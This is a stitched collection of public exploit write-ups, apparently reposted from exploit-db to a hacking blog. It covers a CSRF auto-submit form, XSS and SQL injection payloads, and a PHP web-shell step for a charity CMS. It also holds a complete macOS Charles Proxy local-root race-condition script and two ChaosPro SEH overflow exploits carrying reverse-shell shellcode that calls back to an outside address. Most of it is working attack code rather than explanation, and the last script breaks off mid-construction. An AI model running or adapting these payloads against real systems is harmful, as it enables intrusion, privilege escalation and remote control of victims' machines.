# Exploit Title: Check Box 2016 Q2 Survey Multiple Vulnerabilities
# Exploit Author: Fady Mohamed Osman (@fady_osman)
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Youtube : https://www.youtube.com/user/cutehack3r
# Date: Jan 17, 2017
# Vendor Homepage: https://www.checkbox.com/
# Software Link: https://www.checkbox.com/free-checkbox-trial/
# Version: Check Box 2016 Q2,Check Box 2016 Q4 - Fixed in Checkbox Survey,
Inc. v6.7
# Tested on: Check Box 2016 Q2 Trial on windows Server 2012.
# Description : Checkbox is a survey application deployed by a number of
highly profiled companies and government entities like Microsoft, AT&T,
Vodafone, Deloitte, MTV, Virgin, U.S. State Department, U.S. Secret
Service, U.S. Necular Regulatory Comission, UNAIDS, State Of California
and more!!
For a full list of their clients please visit:
https://www.checkbox.com/clients/
1- Directory traversal vulnerability : For example to download the
web.config file we can send a request as the following:
http://www.example.com/Checkbox/Upload.ashx?f=..\..\web.config&n=web.config
2- Direct Object Reference :
attachments to surveys can be accessed directly without login as the
following:
https://www.victim.com/Checkbox/ViewContent.aspx?contentId=5001
I created a script that can bruteforce the numbers to find ID's that will
download the attachment and you can easily write one on your own ;).
3- Open redirection in login page for example:
https://www.victim.com/Checkbox/Login.aspx?ReturnUrl=http://www.google.com
If you can't see why an open redirection is a problem in login page please
visit the following page:
https://www.asp.net/mvc/overview/security/preventing-
open-redirection-attacks
Timeline:
December 2016 - Discovered the vulnerability during Pen. Test conducted by
ZINAD IT for one of our clients.
Jan 12,2017 - Reported to vendor.
Jan 15,2017 - Sent a kind reminder to the vendor.
Jan 16,2017 - First Vendor Response said they will only consider directory
traversal as a vulnerability and that a fix will be sent in the next day.
Jan 16,2017 - Replied to explain why DOR and Open Redirect is a problem.
Jan 17,2017 - Patch Release Fixed the Directory Traversal.
Jan 17,2017 - Sent another email to confirm if DOR and open redirect wont
be fixed.
Jan 17,2017 - Open redirection confirmed to be fixed in the same patch
released before for DOR the vendor said they didn't believe that's a
security concern and that they have added a warning to let users know that
their attachments will be available to anyone with access to that survey page !!
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863131777
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: chatNow - Multiple Vulnerabilities
# Date: 2016-08-23
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://chatnow.thiagosf.net/
# Software Link: https://github.com/thiagosf/chatNow/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
1. CSRF(Send MSG)
2. Reflected XSS
========== CSRF VULNERABILITY
### Vulnerability
'send_message.php' is not check the csrf token or referer header.
It is possible CSRF Attack.
### Attack Code
<form name="csrf_poc" action="http://127.0.0.1/vul_test/chatNow/send_message.php" method="POST">
<input type="hidden" name="to_user" value="0">
<input type="hidden" name="scroll_page" value="on">
<input type="hidden" name="id_user" value="2">
<input type="hidden" name="message" value="CSRF">
<input type="hidden" name="reserved" value="false">
<input type="submit" value="Attack!">
</form>
<script type="text/javascript">document.forms.csrf_poc.submit();</script>
========== XSS VULNERABILITY
### Vulnerability
This page url is reflected data on page
It is vulnerable page because not filtered reflected url
### Attack code
http://127.0.0.1/vul_test/chatNow/login.php/95fb4"><script>alert(45)</script>b5ca1
### Response
<div id="box_login">
<h2>chatNow</h2>
<form action="/vul_test/chatNow/login.php/95fb4"><script>alert(45)</script>b5ca1" method="post">
<div class="block_field">
<label for="user">Nick</label>
<input type="text" name="user" id="user" maxlength="20" />
</div>
source: https://www.securityfocus.com/bid/47428/info
ChatLakTurk PHP Botlu Video is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/ara.php?ara=[xss]
# # # # #
# Exploit Title: Chartered Accountant Booking Script 1.0 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/chartered-accountant-booking-script/
# Demo: http://fxwebsolution.com/demo/chartered-accountant/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/service-list?city=[SQL]&main_search=
#
# '+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
#
# # # # #
Charles Proxy is a great mac application for debugging web services and
inspecting SSL traffic for any application on your machine.
In order to inspect the SSL traffic it needs to configure the system to use a
proxy so that it can capture the packets and use its custom root CA to decode
the SSL.
Setting a system-wide proxy requires root permissions so this is handled by an
suid binary located within the Charles application folder:
/Applications/Charles.app/Contents/Resources/Charles Proxy Settings
Unfortunately this binary is vulnerable to a race condition which allows a local
user to spawn a root shell. It supports a parameter "--self-repair" which it
uses to re-set the root+suid permissions on itself, with a graphical dialog
shown to the user. However if this is called when the binary is already
root+suid then no password dialog is shown.
It doesn't validate the path to itself and uses a simple API call to get the
path to the binary at the time it was invoked. This means that between executing
the binary and reaching the code path where root+suid is set there is enough
time to replace the path to the binary with an alternate payload which will then
receive the suid+root permissions instead of the Charles binary.
This issue was fixed in Charles 4.2.1 released in November 2017.
https://m4.rkw.io/charles_4.2.sh.txt
2f4a2dca6563d05a201108ec6e9454e2894b603b68b3b70b8f8b043b43ee9284
-------------------------------------------------------------------------------
#!/bin/bash
####################################################
###### Charles 4.2 local root privesc exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ######
####################################################
cd
user="`whoami`"
cat > charles_exploit.c <<EOF
#include <unistd.h>
int main()
{
setuid(0);
seteuid(0);
execl("/bin/bash","bash","-c","rm -f \"/Users/$user/Charles Proxy Settings\"; /bin/bash",NULL);
return 0;
}
EOF
gcc -o charles_exploit charles_exploit.c
if [ $? -ne 0 ] ; then
echo "failed to compile the exploit, you need xcode cli tools for this."
exit 1
fi
rm -f charles_exploit.c
ln -s /Applications/Charles.app/Contents/Resources/Charles\ Proxy\ Settings
./Charles\ Proxy\ Settings --self-repair 2>/dev/null &
rm -f ./Charles\ Proxy\ Settings
mv charles_exploit Charles\ Proxy\ Settings
i=0
while :
do
r=`ls -la Charles\ Proxy\ Settings |grep root`
if [ "$r" != "" ] ; then
break
fi
sleep 0.1
i=$((i+1))
if [ $i -eq 10 ] ; then
rm -f Charles\ Proxy\ Settings
echo "Not vulnerable"
exit 1
fi
done
./Charles\ Proxy\ Settings
# Exploit Title: Charity Management System CMS 1.0 - Multiple Vulnerabilities
# Date: 18/08/2021
# Exploit Author: Davide 't0rt3ll1n0' Taraschi
# Vendor Homepage: https://www.sourcecodester.com/users/tips23
# Software Link: https://www.sourcecodester.com/php/14908/simple-charity-website-management-system-cms-php-free-source-code.htmlpolice-crime-record-management-system.html
# Version: 1.0
# Testeted on: Linux (Ubuntu 20.04) using LAMPP
## Unauthenticated reflected XSS
# Vulnerable code in '/search.php' at line 44/45:
<?php if($count_all <= 0): ?>
<h4 class="text-center">No Article with "<?php echo $_GET['search'] ?>" keyword found.</h4>
The content of the 'search' variable is printed on the page without being checked, leading to XSS
# PoC
Go to 'http://site.com/charity/' and in the search box input "<svg onload=alert(document.domain)>" without the double quotes, and a text box should appear
## Authenticated stored XSS
There is a stored XSS in '/charity/admin/maintenance/manage_topic.php' due to a failure to sanitize user input
# Poc
1) Login as admin
2) Go to '/maintenance/manage_topic.php'
3) In "description" insert "<svg onload=alert(document.domain)>" without the double quotes
4) Click the "save" below
5) An alert box should appear
## POST Authenticated SQL Injection
# Vulnerable code in '/charity/classes/Master.php' at line 67
$del = $this->conn->query("DELETE FROM `topics` where id = '{$id}'");
The $id variable is used without being checked, leading to SQLi
# PoC
Request:
POST /charity/classes/Master.php?f=delete_topic HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 4
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/charity/admin/?page=maintenance/topics
Cookie: PHPSESSID=de17186191c1cbdeb6e815ea8c21103f
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo
Response after 5 seconds (the sleep has been executed)
HTTP/1.1 200 OK
Date: Wed, 18 Aug 2021 14:32:13 GMT
Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8
{"status":"success"}
## GET Authenticated SQL Injection
# Vulnerable code in '/charity/admin/maintenance/manage_topic.php' at line 2/3
if(isset($_GET['id']) && $_GET['id'] > 0){
$qry = $conn->query("SELECT * from `topics` where id = '{$_GET['id']}' ");
...
}
As usual the 'id' variable is passed to the prepared statement without being checked, leading to (another) SQLi
# PoC
Similar to the previous one (same payload)
## POST Unauthenticated SQL Injection
# Vulnerable code in '/charity/classes/Login.php' at line 21
$qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");
The 'username' variable is passed without being sanificated, causing a SQLi
# PoC
Request:
POST /charity/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 84
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/charity/admin/login.php
Cookie: PHPSESSID=de17186191c1cbdeb6e815ea8c21103f
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
username=username' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo&password=password
Response after 5 seconds (the sleep has been executed)
HTTP/1.1 200 OK
Date: Wed, 18 Aug 2021 14:48:18 GMT
Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 164
Connection: close
Content-Type: text/html; charset=UTF-8
{"status":"incorrect","last_qry":"SELECT * from users where username = 'username' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo' and password = md5('password') "}
## PHP Code Injection lead to Authenticated Remote Code Execution (RCE)
# Vulnerable code in /charity/classes/SystemSettings.php at line 37
$qry = $this->conn->query("UPDATE system_info set meta_value = '{$value}' where meta_field = '{$key}' ");
The 'value' variable will be included in the homepage of the site without being checked, leading to RCE.
# PoC
1) Go to /charity/admin/system_info.php and in the "Welcome content" click on "Code View" at the top right.
2) At the bottom of the html code enter the following code: <?php if(isset($_GET['cmd'])) {system($_GET['cmd']);} ?>
3) Click the "update" button
4) Go to the home page and at the end of the url tipe "?cmd=$cmd" without the double quotes and replacing $cmd with the command you want to execute
5) The output should appear in the homepage
#!C:\Python27\python.exe
# Title : ChaosPro 3.1
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
# our egg!
payload = "T00WT00W"
# adjust the stack from 00F2FFA6 to 00F2FFA8
payload += "\x83\xC4\x02"
#the payload
payload += (
# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
"\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
"\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
"\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
"\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
"\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
"\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
"\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
"\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
"\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
"\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
"\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
"\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
"\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
"\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
"\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
"\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
"\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
"\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
"\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
"\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
"\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
"\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
"\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
"\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
"\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
"\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
"\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
"\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
"\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
"\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
"\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
"\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
"\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
"\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
"\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
"\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
"\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
"\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
"\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
"\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
"\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
"\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
"\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
)
#badchars
#\x0a\x1a\x3b\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a
#\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9
#\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8
#\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7
#\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6
#\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5
#\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4
#\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
# stack alignment
pop_esp = "\x5c"
pop_eax = "\x58"
push_eax = "\x50"
push_esp = "\x54"
align_stack = "\x2d\x8f\x8e\x8d\x8c\x2d\x7e\x68\x71\x72\x2d\x01\x01\x01\x01"
zero_eax = "\x25\x7e\x7e\x05\x7e\x25\x01\x01\x7a\x01"
#this needs to be a backwards jump to give us room to call stack jump code
jmpback80 = "\x40\x75\x80\x75"
jmpforward06 = "\x40\x75\x06\x75"
#line containing our payload
line_start = "Username "
line_start += payload + "\n"
#line with our overflow
line_start += "ProjectPath "
junk = line_start
#the buffer starts being overwritten with
# our controlled values at 522
junk += "A" * 522
#junk += alpha_numeric_hex
junk += "A" * (1060 - 522 - 126 - 126 - 126 - len(jmpback80) - len(jmpforward06) - len(jmpforward06))
#- 41 - 4 - 41 - 4 - 41 - 4 - 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4)
# baby nopsled
junk += "A" * 9
# ok, lets start working stuff here ... we have 126 bytesish ...
junk += zero_eax
junk += push_esp + pop_eax # push esp, pop eax
junk += align_stack
junk += push_eax
junk += pop_esp
# first section into the stack
# e7 ff e4 75
# good
junk += zero_eax
junk += "\x2d\x89\x88\x87\x86"
junk += "\x2d\x01\x8f\x77\x8f"
junk += "\x2d\x01\x04\x01\x02"
junk += push_eax
# second section into the stack
# af e7 75 af
# good
junk += zero_eax
junk += "\x2d\x4f\x4e\x4d\x4c"
junk += "\x2d\x01\x39\x8f\x02"
junk += "\x2d\x01\x03\x3c\x01"
junk += push_eax
# third section into the stack
# d7 89 57 30
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x74\x73"
junk += "\x2d\x3e\x19\x01\x8f"
junk += "\x2d\x03\x01\x01\x26"
junk += push_eax
# size for section one
junk += "A" * (
126
- 9 # nopsled
# aligning the stack
- len(zero_eax)
- len(push_esp)
- len(pop_eax)
- len(align_stack)
- len(push_eax)
- len(pop_esp)
# first set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
# second set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
# third set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
)
# baby nopslep just for breathing room
junk += "AAAA"
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80
#Section Two
# baby nopsled
junk += "AAA"
# fourth section into the stack part two
# 30 54 b8 ec
# fourth section into the stack part one
junk += zero_eax
junk += "\x2d\x80\x15\x75\x75"
junk += "\x2d\x80\x20\x32\x35"
junk += "\x2d\x14\x11\x04\x25"
junk += push_eax
# fifth section into the stack
# 74 5a 05 3c
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x89"
junk += "\x2d\x34\x6b\x17\x01"
junk += "\x2d\x01\x01\x01\x01"
junk += push_eax
# sixth section into the stack
# 2e cd 58 53
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x8c"
junk += "\x2d\x1d\x18\x8e\x43"
junk += "\x2d\x01\x01\x17\x01"
junk += push_eax
# seventh section into the stack
# 43 43 db 31
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x8c"
junk += "\x2d\x3e\x7f\x2d\x2d"
junk += "\x2d\x02\x17\x01\x03"
junk += push_eax
junk += "A" * (
126 # amount of room before we need to jump
- 3 # baby nopsled
# part one of fourth set of bytes going onto the stack
- len(zero_eax)
# part two of fourth sec of bytes going onto the stack
- 15
- len(push_eax)
# fifth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
# sixth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
# seventh set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
- 4 # baby nopsled
- len(jmpback80)
)
# Second Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80
# baby nopsled
junk += "AAAA"
# eighth section into the stack part two
# 52 42 0f ff
# good
# eighth section into the stack part one
junk += zero_eax
junk += "\x2d\x65\x65\x75\x75"
junk += "\x2d\x65\x65\x25\x25"
junk += "\x2d\x37\x25\x23\x13"
junk += push_eax
# ninth section into the stack
# ca 81 66 43
# good
junk += zero_eax
junk += "\x2d\x8f\x81\x7c\x7b"
junk += "\x2d\x2d\x17\x01\x8f"
junk += "\x2d\x01\x01\x01\x2b"
junk += push_eax
junk += "A" * (
126 # amount of room before we need to jump
- len(jmpback80)
- 4 # baby nopsled
# eighth set of bytes going onto the stack
# eighth section
- len(zero_eax)
- 15
- len(push_eax)
# ninth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
- len(jmpforward06)
)
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80
#seh address for pop, pop and ret with a 0x00 at the end ...
junk += "\x5d\x10\x40"
# write the evil file
with open('C:\\Program Files\\ChaosPro3.1\\ChaosPro.cfg', 'w') as the_file:
the_file.write(junk)
#!C:\Python27\python.exe
# Title : ChaosPro 2.1
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
# our egg!
payload = "T00WT00W"
#the payload
payload += (
# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
"\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
"\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
"\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
"\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
"\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
"\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
"\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
"\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
"\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
"\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
"\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
"\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
"\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
"\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
"\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
"\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
"\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
"\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
"\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
"\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
"\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
"\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
"\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
"\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
"\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
"\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
"\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
"\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
"\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
"\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
"\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
"\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
"\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
"\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
"\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
"\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
"\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
"\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
"\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
"\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
"\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
"\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
"\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
)
#this needs to be a backwards jump to give us room to call stack jump code
jmpbackD0 = "\x40\x75\xD0\x75"
jmpforward06 = "\x40\x75\x06\x75"
# 16 byte shellcode from: https://www.exploit-db.com/exploits/43773/
opencalc = "\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
# our egghunter shellcode
egghunter = (
"\x66\x81\xca\xff\x0f\x42\x52\x31\xdb\x43"
"\x43\x53\x58\xcd\x2e\x3c\x05\x5a\x74\xec"
"\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xe7"
"\xaf\x75\xe4\xff\xe7"
)
#line containing our payload
line_start = "Username "
line_start += payload + "\n"
#line with our overflow
line_start += "ProjectPath "
junk = line_start
junk += "A" * (2569 - 118 - len(jmpforward06) - len(jmpbackD0))
